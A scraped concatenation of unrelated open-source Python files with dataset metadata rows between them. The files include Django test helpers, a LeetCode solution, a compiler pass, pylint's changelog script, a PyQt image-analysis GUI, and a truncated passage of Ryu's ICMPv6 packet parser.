outfile.write('\n')
if __name__ == "__main__":
ensure_pythonhashseed_set()
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
main()
| apache-2.0 | -3,488,670,208,409,844,000 | 41.857143 | 98 | 0.661429 | false | 4.2 | false | false | false |
blumug/texapi | core/tests_utils.py | 1 | 1204 | import json
from django.contrib.auth.models import User
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from api_users.models import ApiUser
def generate_api_user(username='user', email='[email protected]', password='password', login=True):
"""Generate app user
Args:
username: username
email: email
password: password
login: if set to True, a login query is made
Returns:
user, token, header
"""
token = None
header = None
user = User.objects.create(
username=username, email=email, is_active=True)
ApiUser.objects.create(user=user)
user.set_password('password')
user.save()
c = Client()
data = {
'email': '[email protected]',
'password': 'password',
}
json_data = json.dumps(data)
if login is True:
res = c.post(reverse('api_login'),
json_data, content_type='application/json')
data = json.loads(res.content)
token = Token.objects.get(user=user).key
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token)}
return user, token, header
| mit | 3,645,814,566,693,316,600 | 25.755556 | 95 | 0.634551 | false | 3.909091 | false | false | false |
qiyuangong/leetcode | python/108_Convert_Sorted_Array_to_Binary_Search_Tree.py | 2 | 1027 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
# def sortedArrayToBST(self, nums):
# """
# :type nums: List[int]
# :rtype: TreeNode
# """
# # Recursion with slicing
# if not nums:
# return None
# mid = len(nums) / 2
# root = TreeNode(nums[mid])
# root.left = self.sortedArrayToBST(nums[:mid])
# root.right = self.sortedArrayToBST(nums[mid + 1:])
# return root
def sortedArrayToBST(self, nums):
# Recursion with index
return self.getHelper(nums, 0, len(nums) - 1)
def getHelper(self, nums, start, end):
if start > end:
return None
mid = (start + end) / 2
node = TreeNode(nums[mid])
node.left = self.getHelper(nums, start, mid - 1)
node.right = self.getHelper(nums, mid + 1, end)
return node | mit | 6,595,800,867,033,099,000 | 29.235294 | 60 | 0.53554 | false | 3.389439 | false | false | false |
pfalcon/ScratchABlock | dce.py | 1 | 1917 | import logging
from core import *
_log = logging.getLogger(__file__)
def make_dead(insts, idx):
org_inst = insts[idx]
if org_inst.op == "DEAD":
return
if org_inst.side_effect():
org_inst.dest = None
else:
dead = Inst(None, "DEAD", [])
dead.addr = org_inst.addr
insts[idx] = dead
insts[idx].comments["org_inst"] = org_inst
def dead_code_elimination_forward(bblock):
"""Try to perform eliminations using forward flow. This is reverse
to the natural direction, and requires multiple passing over
bblock to stabilize. Don't use it, here only for comparison."""
vars = bblock.defs()
for v in vars:
last = None
for i, inst in enumerate(bblock.items):
if v in inst.args:
last = None
if inst.dest == v:
if last is not None:
make_dead(bblock.items, last)
last = i
node = bblock.cfg[bblock.addr]
live_out = node.get("live_out")
if last is not None and live_out is not None:
if v not in live_out:
make_dead(bblock.items, last)
def dead_code_elimination_backward(bblock):
node = bblock.cfg[bblock.addr]
live = node.get("live_out")
if live is None:
_log.warn("BBlock %s: No live_out set, conservatively assuming all defined vars are live", bblock.addr)
live = bblock.defs()
live = live.copy()
changes = False
for i in range(len(bblock.items) - 1, -1, -1):
inst = bblock.items[i]
if isinstance(inst.dest, REG):
if inst.dest in live:
live.remove(inst.dest)
else:
make_dead(bblock.items, i)
changes = True
inst = bblock.items[i]
live |= inst.uses()
return changes
dead_code_elimination = dead_code_elimination_backward
| gpl-3.0 | -6,786,215,095,110,471,000 | 28.045455 | 111 | 0.567553 | false | 3.623819 | false | false | false |
PyCQA/pylint | script/bump_changelog.py | 1 | 5851 | # ORIGINAL here: https://github.com/PyCQA/astroid/blob/main/script/bump_changelog.py
# DO NOT MODIFY DIRECTLY
"""
This script permits to upgrade the changelog in astroid or pylint when releasing a version.
"""
# pylint: disable=logging-fstring-interpolation
import argparse
import enum
import logging
from datetime import datetime
from pathlib import Path
from typing import List
DEFAULT_CHANGELOG_PATH = Path("ChangeLog")
RELEASE_DATE_TEXT = "Release date: TBA"
WHATS_NEW_TEXT = "What's New in Pylint"
TODAY = datetime.now()
FULL_WHATS_NEW_TEXT = WHATS_NEW_TEXT + " {version}?"
NEW_RELEASE_DATE_MESSAGE = "Release date: {}".format(TODAY.strftime("%Y-%m-%d"))
def main() -> None:
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("version", help="The version we want to release")
parser.add_argument(
"-v", "--verbose", action="store_true", default=False, help="Logging or not"
)
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
logging.debug(f"Launching bump_changelog with args: {args}")
if "dev" in args.version:
return
with open(DEFAULT_CHANGELOG_PATH) as f:
content = f.read()
content = transform_content(content, args.version)
with open(DEFAULT_CHANGELOG_PATH, "w") as f:
f.write(content)
class VersionType(enum.Enum):
MAJOR = 0
MINOR = 1
PATCH = 2
def get_next_version(version: str, version_type: VersionType) -> str:
new_version = version.split(".")
part_to_increase = new_version[version_type.value]
if "-" in part_to_increase:
part_to_increase = part_to_increase.split("-")[0]
for i in range(version_type.value, 3):
new_version[i] = "0"
new_version[version_type.value] = str(int(part_to_increase) + 1)
return ".".join(new_version)
def get_next_versions(version: str, version_type: VersionType) -> List[str]:
if version_type == VersionType.PATCH:
# "2.6.1" => ["2.6.2"]
return [get_next_version(version, VersionType.PATCH)]
if version_type == VersionType.MINOR:
# "2.6.0" => ["2.7.0", "2.6.1"]
assert version.endswith(".0"), f"{version} does not look like a minor version"
else:
# "3.0.0" => ["3.1.0", "3.0.1"]
assert version.endswith(".0.0"), f"{version} does not look like a major version"
next_minor_version = get_next_version(version, VersionType.MINOR)
next_patch_version = get_next_version(version, VersionType.PATCH)
logging.debug(f"Getting the new version for {version} - {version_type.name}")
return [next_minor_version, next_patch_version]
def get_version_type(version: str) -> VersionType:
if version.endswith("0.0"):
version_type = VersionType.MAJOR
elif version.endswith("0"):
version_type = VersionType.MINOR
else:
version_type = VersionType.PATCH
return version_type
def get_whats_new(
version: str, add_date: bool = False, change_date: bool = False
) -> str:
whats_new_text = FULL_WHATS_NEW_TEXT.format(version=version)
result = [whats_new_text, "=" * len(whats_new_text)]
if add_date and change_date:
result += [NEW_RELEASE_DATE_MESSAGE]
elif add_date:
result += [RELEASE_DATE_TEXT]
elif change_date:
raise ValueError("Can't use change_date=True with add_date=False")
logging.debug(
f"version='{version}', add_date='{add_date}', change_date='{change_date}': {result}"
)
return "\n".join(result)
def get_all_whats_new(version: str, version_type: VersionType) -> str:
result = ""
for version_ in get_next_versions(version, version_type=version_type):
result += get_whats_new(version_, add_date=True) + "\n" * 4
return result
def transform_content(content: str, version: str) -> str:
version_type = get_version_type(version)
next_version = get_next_version(version, version_type)
old_date = get_whats_new(version, add_date=True)
new_date = get_whats_new(version, add_date=True, change_date=True)
next_version_with_date = get_all_whats_new(version, version_type)
do_checks(content, next_version, version, version_type)
index = content.find(old_date)
logging.debug(f"Replacing\n'{old_date}'\nby\n'{new_date}'\n")
content = content.replace(old_date, new_date)
end_content = content[index:]
content = content[:index]
logging.debug(f"Adding:\n'{next_version_with_date}'\n")
content += next_version_with_date + end_content
return content
def do_checks(content, next_version, version, version_type):
err = "in the changelog, fix that first!"
NEW_VERSION_ERROR_MSG = (
"The text for this version '{version}' did not exists %s" % err
)
NEXT_VERSION_ERROR_MSG = (
"The text for the next version '{version}' already exists %s" % err
)
wn_next_version = get_whats_new(next_version)
wn_this_version = get_whats_new(version)
# There is only one field where the release date is TBA
if version_type in [VersionType.MAJOR, VersionType.MINOR]:
assert (
content.count(RELEASE_DATE_TEXT) <= 1
), f"There should be only one release date 'TBA' ({version}) {err}"
else:
next_minor_version = get_next_version(version, VersionType.MINOR)
assert (
content.count(RELEASE_DATE_TEXT) <= 2
), f"There should be only two release dates 'TBA' ({version} and {next_minor_version}) {err}"
# There is already a release note for the version we want to release
assert content.count(wn_this_version) == 1, NEW_VERSION_ERROR_MSG.format(
version=version
)
# There is no release notes for the next version
assert content.count(wn_next_version) == 0, NEXT_VERSION_ERROR_MSG.format(
version=next_version
)
if __name__ == "__main__":
main()
| gpl-2.0 | -1,239,026,852,657,562,600 | 35.798742 | 101 | 0.65664 | false | 3.337707 | false | false | false |
Tigge/platinumshrimp | plugins/feedretriever/test/test_basic_feed.py | 1 | 1797 | import os
import unittest
import unittest.mock
import feedparser
from plugins.feedretriever.feedretriever import Feedpoller
def noop(*a, **kw):
pass
feedparse = feedparser.parse
class FeedRetriverTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.dir = os.path.join("..", os.path.dirname(__file__))
@unittest.mock.patch("feedparser.parse")
def test_basic_feed(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=noop,
on_error=self.fail,
)
@unittest.mock.patch("feedparser.parse")
def test_no_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
feed = Feedpoller(
{"url": "MOCK_URL", "title": "MOCK_TITLE"},
on_created=noop,
on_entry=self.fail,
on_error=self.fail,
)
feed.update_now()
@unittest.mock.patch("feedparser.parse")
def test_initial_update(self, read):
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_0-entries.xml"))
def on_entry(feed, entry):
self.assertEqual(entry.title, "Test Title")
self.assertEqual(entry.link, "http://www.example.com")
self.updated = True
feed = Feedpoller(
{"url": "MOCK_URL", "title": "Test"},
on_created=noop,
on_entry=on_entry,
on_error=self.fail,
)
self.updated = False
read.return_value = feedparse(os.path.join(self.dir, "basic_rss_1-entries.xml"))
feed.update_now()
self.assertTrue(self.updated)
| mit | -1,768,466,555,112,967,400 | 28.459016 | 88 | 0.589872 | false | 3.509766 | true | false | false |
mediawiki-utilities/python-mwsessions | mwsessions/tests/test_sessionizer.py | 1 | 1236 | from nose.tools import eq_
from ..sessionizer import Sessionizer
def test_sessionizer():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process("foo", 1))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("foo", 2))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process("bar", 10))
eq_(len(user_sessions), 2)
user_sessions = list(sessionizer.get_active_sessions())
eq_(len(user_sessions), 1)
def test_none_comparison():
sessionizer = Sessionizer(cutoff=2)
user_sessions = list(sessionizer.process((None, "123"), 0, "AIDS"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 1, None))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Foobar"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((None, "234"), 1, "Barfoo"))
eq_(user_sessions, [])
user_sessions = list(sessionizer.process((1, "foobar"), 10))
eq_(len(user_sessions), 3)
| mit | -2,459,536,942,961,869,300 | 27.090909 | 73 | 0.640777 | false | 3.404959 | false | false | false |
EmreAtes/spack | var/spack/repos/builtin/packages/py-jpype/package.py | 5 | 1891 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyJpype(PythonPackage):
"""JPype is an effort to allow python programs full access to java class
libraries."""
homepage = "https://github.com/originell/jpype"
url = "https://pypi.io/packages/source/J/JPype1/JPype1-0.6.2.tar.gz"
version('0.6.2', '16e5ee92b29563dcc63bbc75556810c1')
version('0.6.1', '468ca2d4b2cff7802138789e951d5d58')
version('0.6.0', 'f0cbbe1d0c4b563f7e435d2bffc31736')
depends_on('[email protected]:')
depends_on('py-setuptools', type='build')
depends_on('java', type=('build', 'run'))
# extra requirements
# depends_on('[email protected]:', type=('build', 'run'))
| lgpl-2.1 | 2,660,631,295,842,671,600 | 41.977273 | 78 | 0.669487 | false | 3.629559 | false | false | false |
massimovassalli/wound | wound.py | 1 | 9075 | from PyQt5 import QtCore, QtGui, QtWidgets
_fromUtf8 = lambda s: s
import sys,os
import wound_view as view
import engine
class woundWindow ( QtWidgets.QMainWindow ):
def __init__ ( self, parent = None ):
QtWidgets.QMainWindow.__init__( self, parent )
self.setWindowTitle( 'Scratch Test Wizard' )
self.ui = view.Ui_facewindow()
self.ui.setupUi( self )
self.setConnections()
self.rebuilding = False
self.selectedItem = None
def refreshTree(self):
self.rebuilding = True
self.ui.treeWidget.clear()
for i in range(len(self.exp)):
el = QtWidgets.QTreeWidgetItem(self.ui.treeWidget)
el.src= self.exp[i]
if self.exp[i].time is None:
tm = 'T{}'.format(i)
else:
tm = self.exp[i].time
el.setText(0,tm)
for w in self.exp[i]:
e = QtWidgets.QTreeWidgetItem(el)
e.src = w
e.setText(0,w.basename)
#e.setBackground(0,QtGui.QColor(255, 0, 0, 127))
n=1
for p in w:
o = QtWidgets.QTreeWidgetItem(e)
o.src = p
o.setText(0, p.filename)
#o.setForeground(0,QtGui.QColor(255,0,0,255))
self.ui.treeWidget.addTopLevelItem(el)
self.rebuilding = False
#fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Select file', './')
#q = QtWidgets.QFileDialog()
#q.setAcceptMode(QtWidgets.QFileDialog.AcceptOpen)
#q.setFileMode(QtWidgets.QFileDialog.ExistingFiles)
#progress = QtWidgets.QProgressDialog("Opening files...", "Cancel opening", 0, pmax)
def selectElement(self,item):
if self.rebuilding is True:
return
self.selectedItem = item
self.ui.statusBar.showMessage('ITEM {} depth {}'.format(item.src.basename,item.src.depth))
#self.ui.treeWidget.itemWidget()
def expSave(self):
filtered = QtWidgets.QFileDialog.getSaveFileName(self,caption='Save the experiment',filter='*.exp')
if filtered[0] != '':
filename = filtered[0]
if filename[-4:] != '.exp':
filename = filename + '.exp'
self.exp.save(filename)
def expLoad(self):
selection = QtWidgets.QFileDialog.getOpenFileName (self, caption='Select an experiment file',filter='*.exp')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
self.exp = engine.load(filename)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
def expGuess(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
exp = engine.exp()
if exp.guess(folder):
self.exp = exp
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as an experiment')
def rewatch(self):
self.watch()
def watch(self,element=None):
if self.rebuilding is True:
return
if element is None:
element = self.selectedItem
myelement = element.src
if myelement.is_picture():
QtWidgets.QApplication.setOverrideCursor( QtGui.QCursor(QtCore.Qt.WaitCursor))
if self.ui.view_raw.isChecked():
self.ui.pic.setPixmap( QtGui.QPixmap(myelement.dir) )
elif self.ui.view_stored.isChecked():
if myelement.isProcessed():
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
else:
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.dir))
elif self.ui.view_otf.isChecked():
myelement.process( sens = self.ui.cannysigma.value()/100.0, minhole=self.ui.minholes.value(),minobj=self.ui.minobj.value() )
self.ui.pic.setPixmap(QtGui.QPixmap(myelement.getOverlay()))
QtWidgets.QApplication.restoreOverrideCursor()
def tpAdd(self):
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
tp = engine.timepoint()
if tp.guess(folder):
self.exp.append(tp)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a TimePoint')
def tpDel(self):
tp = self.selectedItem.src
if tp.is_timepoint():
id = self.exp.index(tp)
del(self.exp[id])
self.refreshTree()
def wellAdd(self):
tp = self.selectedItem.src
if tp.is_timepoint():
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
well = engine.well()
if well.guess(folder):
tp.append(well)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def wellDel(self):
well = self.selectedItem.src
if well.is_well():
id = well.parent.index(well)
del(well.parent[id])
self.refreshTree()
def picDel(self):
pic = self.selectedItem.src
if pic.is_picture():
id = pic.parent.index(pic)
del (pic.parent[id])
self.refreshTree()
def picAdd(self):
tp = self.selectedItem.src
if tp.is_well():
selection = QtWidgets.QFileDialog.getOpenFileName(self, caption='Select a Picture', filter='*.*')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
pic = engine.picture()
if pic.guess(filename):
tp.append(pic)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def setConnections(self):
#clickable1=[self.ui.radio_view,self.ui.radio_deriv,self.ui.radio_smooth]
#editable =[self.ui.derorder,self.ui.s_mth,self.ui.s_vth,self.ui.sg_fw,self.ui.sg_mm,self.ui.plath,self.ui.lasth]
#for o in clickable1:
# o.clicked.connect(self.refreshCurve)
#for o in editable:
# o.editingFinished.connect(self.updateCurve)
# o.valueChanged.connect(self.reddish)
self.ui.actionGuess.triggered.connect(self.expGuess)
self.ui.actionLoad.triggered.connect(self.expLoad)
self.ui.actionSave.triggered.connect(self.expSave)
self.ui.treeWidget.currentItemChanged.connect(self.selectElement)
self.ui.actionAdd.triggered.connect(self.tpAdd)
self.ui.actionRemove.triggered.connect(self.tpDel)
self.ui.actionAddWell.triggered.connect(self.wellAdd)
self.ui.actionRemoveWell.triggered.connect(self.wellDel)
self.ui.actionAddPic.triggered.connect(self.picAdd)
self.ui.actionRemovePic.triggered.connect(self.picDel)
self.ui.treeWidget.currentItemChanged.connect(self.watch)
self.ui.view_stored.clicked.connect(self.rewatch)
self.ui.view_raw.clicked.connect(self.rewatch)
self.ui.view_otf.clicked.connect(self.rewatch)
self.ui.cannysigma.valueChanged.connect(self.rewatch)
self.ui.minobj.valueChanged.connect(self.rewatch)
self.ui.minholes.valueChanged.connect(self.rewatch)
QtCore.QMetaObject.connectSlotsByName(self)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName( 'Scratch assay Wizard' )
canale = woundWindow()
canale.show()
#QtCore.QObject.connect( app, QtCore.SIGNAL( 'lastWindowClosed()' ), app, QtCore.SLOT( 'quit()' ) )
sys.exit(app.exec_())
| gpl-3.0 | -9,087,444,954,185,123,000 | 39.333333 | 140 | 0.614325 | false | 3.952526 | false | false | false |
AstroTech/workshop-python | design-patterns/solution/iterator_addressbook.py | 1 | 1148 | class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
def __iter__(self):
self.current_element = 0
return self
def __next__(self):
if self.current_element >= len(self.adresy):
raise StopIteration
address = self.adresy[self.current_element]
self.current_element += 1
return address
class Adres:
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f'{self.__dict__}'
kontakt = Kontakt(imie='Jan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
| mit | 1,112,297,815,520,693,000 | 27 | 69 | 0.579268 | false | 2.94359 | false | false | false |
citrix-openstack-build/ryu | ryu/lib/packet/icmpv6.py | 2 | 19717 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import sys
import array
import binascii
from . import packet_base
from . import packet_utils
from ryu.lib import addrconv
from ryu.lib import stringify
ICMPV6_DST_UNREACH = 1 # dest unreachable, codes:
ICMPV6_PACKET_TOO_BIG = 2 # packet too big
ICMPV6_TIME_EXCEEDED = 3 # time exceeded, code:
ICMPV6_PARAM_PROB = 4 # ip6 header bad
ICMPV6_ECHO_REQUEST = 128 # echo service
ICMPV6_ECHO_REPLY = 129 # echo reply
MLD_LISTENER_QUERY = 130 # multicast listener query
MLD_LISTENER_REPOR = 131 # multicast listener report
MLD_LISTENER_DONE = 132 # multicast listener done
# RFC2292 decls
ICMPV6_MEMBERSHIP_QUERY = 130 # group membership query
ICMPV6_MEMBERSHIP_REPORT = 131 # group membership report
ICMPV6_MEMBERSHIP_REDUCTION = 132 # group membership termination
ND_ROUTER_SOLICIT = 133 # router solicitation
ND_ROUTER_ADVERT = 134 # router advertisment
ND_NEIGHBOR_SOLICIT = 135 # neighbor solicitation
ND_NEIGHBOR_ADVERT = 136 # neighbor advertisment
ND_REDIREC = 137 # redirect
ICMPV6_ROUTER_RENUMBERING = 138 # router renumbering
ICMPV6_WRUREQUEST = 139 # who are you request
ICMPV6_WRUREPLY = 140 # who are you reply
ICMPV6_FQDN_QUERY = 139 # FQDN query
ICMPV6_FQDN_REPLY = 140 # FQDN reply
ICMPV6_NI_QUERY = 139 # node information request
ICMPV6_NI_REPLY = 140 # node information reply
ICMPV6_MAXTYPE = 201
class icmpv6(packet_base.PacketBase):
"""ICMPv6 (RFC 2463) header encoder/decoder class.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
type\_ Type
code Code
csum CheckSum
(0 means automatically-calculate when encoding)
data Payload.
ryu.lib.packet.icmpv6.echo object, or \
ryu.lib.packet.icmpv6.nd_neighbor object, or a bytearray.
============== ====================
"""
_PACK_STR = '!BBH'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ICMPV6_TYPES = {}
@staticmethod
def register_icmpv6_type(*args):
def _register_icmpv6_type(cls):
for type_ in args:
icmpv6._ICMPV6_TYPES[type_] = cls
return cls
return _register_icmpv6_type
def __init__(self, type_, code, csum, data=None):
super(icmpv6, self).__init__()
self.type_ = type_
self.code = code
self.csum = csum
self.data = data
@classmethod
def parser(cls, buf):
(type_, code, csum) = struct.unpack_from(cls._PACK_STR, buf)
msg = cls(type_, code, csum)
offset = cls._MIN_LEN
if len(buf) > offset:
cls_ = cls._ICMPV6_TYPES.get(type_, None)
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg, None, None
def serialize(self, payload, prev):
hdr = bytearray(struct.pack(icmpv6._PACK_STR, self.type_,
self.code, self.csum))
if self.data is not None:
if self.type_ in icmpv6._ICMPV6_TYPES:
hdr += self.data.serialize()
else:
hdr += self.data
if self.csum == 0:
self.csum = packet_utils.checksum_ip(prev, len(hdr), hdr + payload)
struct.pack_into('!H', hdr, 2, self.csum)
return hdr
@icmpv6.register_icmpv6_type(ND_NEIGHBOR_SOLICIT, ND_NEIGHBOR_ADVERT)
class nd_neighbor(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor Solicitation and
Neighbor Advertisement messages. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res R,S,O Flags for Neighbor Advertisement. \
The 3 MSBs of "Reserved" field for Neighbor Solicitation.
dst Target Address
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_TLA = 2 # Target Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_RH = 4 # Redirected Header
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_neighbor._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, dst, type_=None, length=None, data=None):
self.res = res << 29
self.dst = dst
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(res, dst) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res >> 29, addrconv.ipv6.bin_to_text(dst))
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_neighbor._PACK_STR, self.res,
addrconv.ipv6.text_to_bin(self.dst)))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_neighbor._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_SOLICIT)
class nd_router_solicit(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Solicitation messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res This field is unused. It MUST be initialized to zero.
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_solicit._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, type_=None, length=None, data=None):
self.res = res
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
res = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res)
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_solicit._PACK_STR, self.res))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_router_solicit._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_ADVERT)
class nd_router_advert(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Advertisement messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
ch_l Cur Hop Limit.
res M,O Flags for Router Advertisement.
rou_l Router Lifetime.
rea_t Reachable Time.
ret_t Retrans Timer.
type\_ List of option type. Each index refers to an option. \
None if no options. \
NOTE: This implementation support one or more \
options.
length List of option length. Each index refers to an option. \
None if no options. \
data List of option data. Each index refers to an option. \
None if no options. \
